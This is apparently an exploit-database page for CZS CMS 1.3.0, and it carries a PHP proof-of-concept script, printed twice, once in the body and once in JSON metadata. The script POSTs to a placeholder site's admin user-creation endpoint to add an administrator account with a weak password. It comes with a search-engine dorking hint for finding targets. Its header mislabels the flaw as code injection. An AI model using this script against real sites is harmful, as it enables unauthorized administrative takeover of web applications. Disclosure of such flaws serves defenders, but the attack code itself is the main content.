📄 CZS CMS 1.3.0 Cross Site Request Forgery_PACKETSTORM:212000

Description

This proof of concept leverages a known cross site request forgery vulnerability in CZS CMS version 1.3.0 to add an administrator...

Visit Original Source

Basic Information

ID PACKETSTORM:212000

Published Nov 25, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : CZS CMS v 1.3.0 php code injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.cszcms.com |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: CZS CMS version 1.3.0 suffers from a cross site request forgery vulnerability.

(Related : https://packetstorm.news/files/id/189609/ Related CVE numbers: ) .

[+] Usage : php poc.php

[+] Set Target : LIne 5

[+] PayLoad :

<?php
// CSRF PoC script in PHP

// Define the target URL and POST fields
$target_url = "http://TARGETSITE/admin/users/new/add";
$fields = [
'name' => 'admin',
'email' => '[email protected]',
'password' => 'pass',
'con_password' => 'pass',
'group' => '1',
'pass_change' => 'yes',
'active' => 1
];

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($fields)); // Post the fields as URL-encoded
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Return response as string

// Execute cURL request and capture the response
$response = curl_exec($ch);

// Check for errors
if ($response === false) {
echo "Error: " . curl_error($ch);
} else {
echo "Request sent successfully!";
}

// Close cURL session
curl_close($ch);
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-11-25T19:08:43",
    "description": "This proof of concept leverages a known cross site request forgery vulnerability in CZS CMS version 1.3.0 to add an administrator...",
    "published": "2025-11-25T00:00:00",
    "modified": "2025-11-25T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 CZS CMS 1.3.0 Cross Site Request Forgery",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212000",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : CZS CMS v 1.3.0 php code injection vulnerability                                                                            |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |\n    | # Vendor    : https://www.cszcms.com                                                                                                      |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: CZS CMS version 1.3.0 suffers from a cross site request forgery vulnerability.\n    \n        (Related : https://packetstorm.news/files/id/189609/ Related CVE numbers: ) .\n    \n    [+] Usage : php poc.php \n    \n    [+] Set Target : LIne 5 \n    \n    [+] PayLoad :\n    \n    <?php\n    // CSRF PoC script in PHP\n    \n    // Define the target URL and POST fields\n    $target_url = \"http://TARGETSITE/admin/users/new/add\";\n    $fields = [\n        'name' => 'admin',\n        'email' => '[email protected]',\n        'password' => 'pass',\n        'con_password' => 'pass',\n        'group' => '1',\n        'pass_change' => 'yes',\n        'active' => 1\n    ];\n    \n    // Initialize cURL session\n    $ch = curl_init();\n    \n    // Set cURL options\n    curl_setopt($ch, CURLOPT_URL, $target_url);\n    curl_setopt($ch, CURLOPT_POST, true);\n    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($fields)); // Post the fields as URL-encoded\n    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Return response as string\n    \n    // Execute cURL request and capture the response\n    $response = curl_exec($ch);\n    \n    // Check for errors\n    if ($response === false) {\n        echo \"Error: \" . curl_error($ch);\n    } else {\n        echo \"Request sent successfully!\";\n    }\n    \n    // Close cURL session\n    curl_close($ch);\n    ?>\n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212000",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212000/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply